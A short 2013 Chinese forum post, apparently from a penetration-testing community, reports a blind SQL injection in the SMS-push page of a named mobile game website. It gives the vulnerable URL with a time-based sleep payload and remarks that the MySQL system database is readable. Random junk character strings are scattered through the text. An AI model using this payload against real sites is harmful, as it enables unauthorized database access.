中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:
/ l# p' D, w7 w6 S$ m凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。$ s* v' U+ D% `- Y4 S+ ]6 P* N7 g
3 |, h; y* ^/ C
详细说明:4 ^& o6 I0 F3 D8 c1 k! u
存在SQL盲注url:
; e  _+ y5 I2 N1 k- i, ]. D$ Tfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
# [0 F/ Q7 c8 q; M4 u: L5 G) Nhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
8 U- f( h) l" j! `http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png7 }- a7 w; \: `* z1 [' v, S) ~; ?
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg0 y; u! i+ e. {. `+ [8 l9 I2 ?8 A( J. Y

7 i* A6 Y% @. A8 I) e5 b2 h

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2